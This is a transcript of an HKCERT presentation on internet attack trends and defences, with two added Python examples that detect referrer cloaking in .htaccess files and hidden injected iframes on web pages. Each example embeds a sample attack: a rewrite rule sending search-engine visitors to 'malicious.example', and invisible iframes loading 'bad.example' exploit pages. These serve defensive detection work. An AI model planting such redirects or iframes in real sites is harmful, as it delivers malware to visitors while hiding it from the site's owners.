3 Hkcert Trend

Transcript

  • 1. Internet Attack Trend and Defense. SC Leung, Senior Consultant
  • 2. Agenda
    • Trend of the information security threat
    • How we become victims …
    • Most economical way to mitigate risks
  • 3. Security Threat Landscape
  • 4. Attacks Targeting Our Vulnerabilities
    • Systems and applications
      • Insecure default configurations: AutoRun for USB drives, CD-ROMs …
      • All software has security holes
        • Window of opportunity between discovery of a security hole and availability of a patch
    • Humans
      • People can be cheated: “social engineering” techniques
      • The way you gain trust from others is the way a hacker gains trust from you
  • 5. New Phishing Tactic Targets Tabs
    • http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/ (proof of concept included)
    • http://krebsonsecurity.com/2010/05/devious-new-phishing-tactic-targets-tabs/
  • 6. Botnet (roBot Network) is the major threat
    (Diagram: Bot Herder → C&C (Command & Control Centre) → bots → attacks on your computers, the victims)
  • 7. Maturity of the Underground Economy
    • Commercialization
      • Selling products (credentials, malware and tools)
      • Hosting: spam or phishing hosting
      • CaaS (cybercrime as a service): hired guns
    • Professionalization
      • Manageability of infrastructure → botnets
      • Specialization, outsourcing and globalization of HR
      • Chained exploits
    • Risk management
      • Invisibility
      • Security: authentication, encryption
      • Survivability, e.g. Conficker
    • Overall trend: increasing sophistication
  • 8. Malware 2.0: Evade Detection, Command & Control
    • Propagation
    • Forming a botnet
    • Manage
    • Update
    • Survive adverse conditions
    • Malware today turns the victim PC into part of a botnet
  • 9. Malware 2.0
    • Encryption or obfuscation
    • Morphing
    • Uses search engines to evade detection
        • Malware URL is visible only when the visitor is referred by a search engine
        • Done by configuring the web server’s “.htaccess” file
    (Slide shows sample content of an “.htaccess” file under the attacker’s control; the image is not reproduced in the transcript)
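As an added example (not from the slide deck), the following Python shows how the referrer-based cloaking described above works and how to check a page for it offline. The .htaccess content, the hostnames and the request profiles are constructed for illustration; the script implements only the subset of mod_rewrite that such cloaking relies on (RewriteCond on %{...} variables with the NC and OR flags, and RewriteRule with a redirect target) and replays one URL under several Referer values. Against a live site the same comparison is done by fetching the URL with and without a search-engine Referer header.

```python
import re
from typing import Optional

# Constructed sample (not the file shown in the talk) of the referrer-cloaking
# trick the slide describes: visitors arriving from a search engine are
# redirected to the malware landing page, while direct visits (the site owner,
# an AV vendor's crawler) see the harmless page.
SAMPLE_HTACCESS = r"""
RewriteEngine On
RewriteCond %{HTTP_REFERER} google\. [NC,OR]
RewriteCond %{HTTP_REFERER} bing\.   [NC,OR]
RewriteCond %{HTTP_REFERER} yahoo\.  [NC]
RewriteRule ^(.*)$ http://malicious.example/landing.php [R=302,L]
"""


def _expand(test_string: str, request: dict) -> str:
    """Replace %{VAR} with the request's value; unset headers expand to ""."""
    return re.sub(r"%\{(\w+)\}", lambda m: request.get(m.group(1), ""), test_string)


def _parse_flags(token: Optional[str]) -> set:
    """Turn '[NC,OR]' or '[R=302,L]' into {'NC','OR'} / {'R','L'}."""
    if not token:
        return set()
    return {f.strip().upper().split("=")[0] for f in token.strip("[]").split(",")}


def _cond_matches(cond: tuple, request: dict) -> bool:
    """Evaluate one RewriteCond (supports the '!' negation prefix and NC)."""
    test_string, pattern, flags = cond
    negate = pattern.startswith("!")
    if negate:
        pattern = pattern[1:]
    re_flags = re.IGNORECASE if "NC" in flags else 0
    hit = re.search(pattern, _expand(test_string, request), re_flags) is not None
    return hit != negate


def evaluate_rewrite(htaccess: str, request: dict) -> Optional[str]:
    """Return the redirect target the first matching RewriteRule would send the
    request to, or None if the request is served normally.

    OR joins a condition with the next one; the resulting groups are ANDed,
    as in mod_rewrite. The rule pattern is matched against the path with the
    leading slash removed (per-directory .htaccess context).
    """
    pending = []
    for raw in htaccess.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive, args = parts[0], parts[1:]
        if directive == "RewriteCond" and len(args) >= 2:
            flags = _parse_flags(args[2] if len(args) > 2 else None)
            pending.append((args[0], args[1], flags))
        elif directive == "RewriteRule" and len(args) >= 2:
            rule_flags = _parse_flags(args[2] if len(args) > 2 else None)
            groups, current = [], []
            for cond in pending:
                current.append(cond)
                if "OR" not in cond[2]:
                    groups.append(current)
                    current = []
            if current:
                groups.append(current)
            pending = []
            path = request.get("path", "/").lstrip("/")
            re_flags = re.IGNORECASE if "NC" in rule_flags else 0
            if re.search(args[0], path, re_flags) and all(
                any(_cond_matches(c, request) for c in g) for g in groups
            ):
                return args[1]
    return None


def cloaking_report(htaccess: str, path: str = "/index.html") -> dict:
    """Replay the same URL under several referrers. A page that redirects only
    search-engine visitors is the cloaking signature the slide describes."""
    profiles = {
        "direct": {},
        "google": {"HTTP_REFERER": "https://www.google.com/search?q=cheap+software"},
        "bing": {"HTTP_REFERER": "https://www.bing.com/search?q=cheap+software"},
        "other_site": {"HTTP_REFERER": "https://blog.example.org/post/1"},
    }
    return {name: evaluate_rewrite(htaccess, {"path": path, **hdrs})
            for name, hdrs in profiles.items()}


def is_referrer_cloaked(report: dict) -> bool:
    """Direct visit is served normally but a search-engine referrer is redirected."""
    return report["direct"] is None and any(report[k] for k in ("google", "bing"))


if __name__ == "__main__":
    report = cloaking_report(SAMPLE_HTACCESS)
    for name, target in report.items():
        print(f"{name:<11} -> {target or 'served normally'}")
    print("cloaked:", is_referrer_cloaked(report))
```

The point for a web admin is that a direct check of the page tells you nothing: the server only misbehaves for a visitor who looks like they came from a search result, so any site scan has to send search-engine referrers (and, for the user-agent variant of the same trick, crawler and browser user-agent strings) and diff the responses.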
  • 10. Malware Propagation Channels: Executables, Document Malware, Websites
  • 11. Malware Propagation Channels: Executables
    • Fake security software
    • Fake video player codecs
  • 12. Malware Propagation Channels: Document Malware
    • Malware embedded in PDF or Office files
    • Zeus botnet served PDF malware (Apr 2010)
    (Image by Websense)
  • 13. Malware Propagation Channels: Websites
    • Legitimate and trusted websites compromised
    • Used to redirect users to malicious websites via injected invisible iframes
    • The most significant channel
    • Web admins are often unable to detect and mitigate the risk
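As an added example (not part of the slides), the following Python shows the check a web admin can run for the injected invisible iframes mentioned above: parse the page and flag every iframe that is sized 0x0 or 1x1, hidden by its own style, or nested inside a CSS-hidden container. The sample page, the hostnames and the size threshold are constructed for illustration. It goes slightly beyond the slide by also catching frames positioned far off-screen, another common way to keep an injected frame out of sight.

```python
import re
from html.parser import HTMLParser

# Constructed sample (not from the talk) of a compromised page: the legitimate
# content and a visible video embed are untouched, but the attacker has
# appended a 1x1 iframe hidden by CSS and a second iframe inside a display:none
# container, both pointing at exploit servers.
SAMPLE_PAGE = """
<html><body>
<h1>Company News</h1>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<p>Welcome to our site.</p>
<iframe src="http://bad.example/in.cgi?3" width="1" height="1" frameborder="0"
        style="visibility:hidden"></iframe>
<div style="display:none"><iframe src="http://bad2.example/x.php"></iframe></div>
</body></html>
"""

# CSS that hides an element outright or pushes it far off-screen.
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px", re.I
)
VOID_TAGS = {"br", "hr", "img", "input", "link", "meta", "area", "base", "col", "source"}


def _tiny(value) -> bool:
    """True for width/height attributes of 2px or less (0x0 and 1x1 frames)."""
    try:
        return int(str(value).lower().rstrip("px")) <= 2
    except ValueError:
        return False


class HiddenIframeFinder(HTMLParser):
    """Collects iframes a visitor cannot see: tiny, hidden by their own style,
    or nested inside a hidden container."""

    def __init__(self):
        super().__init__()
        self.stack = []        # (tag, hidden_by_css) for each open element
        self.hidden_depth = 0  # > 0 while inside a CSS-hidden element
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden_here = bool(HIDDEN_CSS.search(a.get("style") or ""))
        if tag == "iframe":
            reasons = []
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("tiny size")
            if hidden_here:
                reasons.append("hidden by own style")
            if self.hidden_depth:
                reasons.append("inside hidden container")
            if reasons:
                self.findings.append({"src": a.get("src") or "", "reasons": reasons})
        if tag not in VOID_TAGS:
            self.stack.append((tag, hidden_here))
            self.hidden_depth += hidden_here

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates unclosed elements.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                self.hidden_depth -= sum(h for _, h in self.stack[i:])
                del self.stack[i:]
                break


def find_hidden_iframes(html: str) -> list:
    """Return [{'src': ..., 'reasons': [...]}, ...] for every suspicious iframe."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

Run it over saved copies of your own pages, ideally diffing against a known-good copy: legitimate hidden iframes exist (analytics and ad tags use them), so treat a hit as a lead to check the src domain rather than proof of compromise, and remember that injected script can create the frame at runtime, which a static parse will not see.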
  • 14. Malware Propagation via Websites
    • Mass infection of WordPress blogs hosted by Network Solutions (Apr 2010)
      • Exploited insecure web application configuration
  • 15. PHPNuke.org web site hacked (7 May 2010)
    • Serving several exploits
  • 16. Malware Propagation Channels: Social Engineering & Black Hat SEO
    • Hackers exploit Social Network Services to convince victims
    • Hackers use Search Engine Optimization techniques to push malicious websites up the search rankings
  • 17. Malware Propagation Channels: Targeted Attacks
    • Targeted, crafted email to corporations and governments
  • 18. Attacks Following the Money
    • Phishing
      • Targeting traditional online banking and online games
      • Obtaining credentials for later use or for sale
      • via keyloggers
    • Banking Trojans
      • Targeting newer online banking services, especially those using two-factor authentication
      • Performing the fraudulent transaction on the spot
      • via advanced banking trojans using man-in-the-browser techniques
  • 19. Data Leakage
    • P2P File Sharing
      • Insecure default settings
      • Malware embedded in P2P software, e.g. Foxy
    • Social Networking Services
      • Insecure default privacy settings
      • Personal information leaked by friends
      • Lack of control over 3rd-party apps on SNS
      • Malware on SNS
  • 20. Social Networks: ID Theft, Data Leakage, Social Engineering
  • 21. Client Side Attacks via Social Network Sites
    • Surge in Facebook malware
    • TRUST:
      • Social engineering trick: spoof the user’s friend and send a message with a URL purporting to be a movie
      • The URL brings the user to a fake YouTube site
  • 22. Client Side Attacks via Social Network Sites
    • The fake site suggests installing a codec in order to view the movie
    (Screenshot: “Install the codec to view the movie” prompt)
  • 23. Submitting the malware to VirusTotal.com: only a small portion of scanners identify it
  • 24. Redirection of attacks to a central exploit server
    • Malicious servers redirect victims to the Exploit Server, which acts as the central delivery point
    • Source: http://www.honeynet.org/papers/mws/KYE-Malicious_Web_Servers.htm
  • 25. Mobile Computing
    • Attacks exist for different mobile platforms
      • Nov 2009: attacks on jailbroken iPhones through the exposed SSH service
      • MobileSpy logs GPS location, call logs and SMS; versions available for Android, BlackBerry, iPhone, Windows Mobile and Symbian
    • Devices store personal and sensitive data
    • Some banks (e.g. Lloyds TSB in the UK) have started to use the mobile as a banking client
    • Next-generation data/voice integration
    • Insecure habits
      • Short URLs are common
      • Clicking links in email is common
      • Saved passwords are common
    • Security protection is less mature than on the PC
  • 26. Targeted Attacks Continue
    • Chained exploits
    • Advanced Persistent Threats
      • Against governments, critical infrastructure and private companies
  • 27. Consequence of Attack
  • 28. Consequences of Security Exposure
    • Machines fall under the control of hackers
    • Theft of credentials → financial loss
    • Hackers launch attacks against the whole local network from the compromised machine
    • Bandwidth and performance degradation
    • Legal liability → liable for hacking activities originating from your premises
  • 29. Mitigation Strategies Revisited
  • 30. What do we do?
    • International collaboration
      • Good example: the Conficker Working Group
    • Cyber drill exercises
    • Proactive discovery of incidents
      • Finding compromised web sites and malware hosting
    • Intelligence and research
      • Collecting information on hacker behaviour
  • 31. Awareness, Education and Training (for the public and for ISPs)
    • Awareness
      • Social engineering
      • Emerging attacks, e.g. via SNS and mobile
    • Social engineering drill exercise
    • Publish guidelines
    • Training of staff
    • Local cyber response drills
      • Cyber response drill: some teams hold one annually
    • Form an ISAC (Information Sharing and Analysis Centre)
  • 32. Proactivity in Incident Handling at HKCERT
    • Incident report statistics (3 Apr to 30 Sep 2009)
    • Traditional reports vs proactive discovery (searching for incidents that were not reported)
      • Traditional reports: 493 (60%); proactive discovery: 330 (40%)
    • Among the traditional reports (493 cases)
      • Direct phone-in: 244 (49.5%); referral: 170 (34.5%); direct email: 79 (16%)
      • Reported by local parties: 329 (67%); reported by overseas parties: 164 (33%)
    • Conclusions:
      • Proactive discovery is becoming a key source of incident reports
      • Overseas and referral reports form a significant portion
      • More resources are required for handling external communication and for developing automated search capability
  • 33. What can you do – infrastructure?
    • Personal
      • Install antivirus
      • Install a personal firewall
      • Close all security holes
        • Patch systems
      • Set strong passwords
      • Close insecure default settings: AutoRun, …
    • Company
      • Install antivirus
      • Install a firewall; block all incoming traffic except known services
      • Separate SAMS, ITED and public servers into zones
      • Set up a security policy
        • Ban unauthorized servers in your network
  • 34. HKCERT Guidelines
    • "Autorun Virus" Removal Procedure
    • SQL Injection Defense Guideline
    • Data Protection Guideline
    • Guideline for Safe Use of Wireless LAN
    • SME Information Security Guideline
    • Guideline for Prevention of Spyware and other Potentially Unwanted Software
    • http://www.hkcert.org/english/sguide_faq/home.html
  • 35. Point of Contact
    • Phone: +852 8105 6060
    • Fax: +852 8105 9760
    • Email: hkcert@hkcert.org
    • URL: http://www.hkcert.org/
